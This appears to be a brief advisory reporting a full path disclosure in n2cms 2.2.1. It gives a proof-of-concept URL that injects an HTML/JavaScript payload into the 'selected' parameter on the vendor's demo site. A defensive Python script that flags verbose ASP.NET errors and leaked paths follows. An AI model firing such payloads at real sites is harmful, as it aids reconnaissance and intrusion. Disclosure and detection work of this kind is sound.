n2cms version 2.2.1 suffers from a path disclosure vulnerability.
3999ea7bf894cbb36512a747568273dd9e6751f2d406d253df2dbab8f24da389
# Affected software: n2cms
# Type of vulnerability: full path disclosure
# URL: n2cms.com
# Discovered by: provensec
# Website: provensec.com
# Version: 2.2.1 <http://n2cms.codeplex.com/releases>
# Proof of concept
http://demo.n2cms.com/N2/Files/FileSystem/File.aspx?selected=%2fupload%2f%22%3E%3Cimg%20src=d%20onerror=confirm(1);%3E1.php%2f
Manipulating the selected parameter produces an error page that discloses the system path.
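A defender-side check for the behaviour described above, as an added example that is not part of the original advisory: it scans an error response body for detailed-error markers and absolute Windows paths, so it can be run against responses from your own instance. The sample bodies, the `Example.Page` name and the `C:\inetpub\wwwroot\example` path are constructed, and treating the error as ASP.NET's detailed error page is an assumption.

```python
import html
import re

# Drive-letter absolute path; spaces allowed in directories, not in the last segment.
WINDOWS_PATH = re.compile(r"(?<![A-Za-z])[A-Za-z]:\\(?:[\w.$() -]+\\)*[\w.$()-]+")
# Strings that appear on ASP.NET's detailed ("yellow screen") error page.
VERBOSE_MARKERS = (
    re.compile(r"Server Error in '.*?' Application"),
    re.compile(r"Source File:"),
    re.compile(r"Stack Trace:"),
)

def find_disclosed_paths(body):
    """Return unique absolute filesystem paths found in a response body."""
    text = html.unescape(body)
    seen = []
    for match in WINDOWS_PATH.finditer(text):
        if match.group(0) not in seen:
            seen.append(match.group(0))
    return seen

def audit_response(status, body):
    """Summarise what an error response reveals to the client."""
    text = html.unescape(body)
    paths = find_disclosed_paths(body)
    verbose = any(m.search(text) for m in VERBOSE_MARKERS)
    return {"status": status, "verbose_error": verbose, "paths": paths,
            "leaks": bool(paths) or verbose}

# Constructed sample bodies (not captured from any real server).
VERBOSE_BODY = r"""<h1>Server Error in '/' Application.</h1>
<h2><i>Illegal characters in path.</i></h2>
<b>Source File:</b> C:\inetpub\wwwroot\example\Files\File.aspx.cs<b> &nbsp; Line:</b> 27
<b>Stack Trace:</b><pre>[ArgumentException: Illegal characters in path.]
   Example.Page.OnInit(EventArgs e) in C:\inetpub\wwwroot\example\Files\File.aspx.cs:27</pre>"""
GENERIC_BODY = "<h1>Something went wrong</h1><p>Reference: 7f3a</p>"

if __name__ == "__main__":
    for name, body in (("verbose", VERBOSE_BODY), ("generic", GENERIC_BODY)):
        print(name, audit_response(500, body))
```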